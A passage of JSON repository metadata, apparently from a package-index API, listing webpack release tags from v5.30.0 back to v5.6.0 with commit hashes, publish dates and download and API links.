:"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl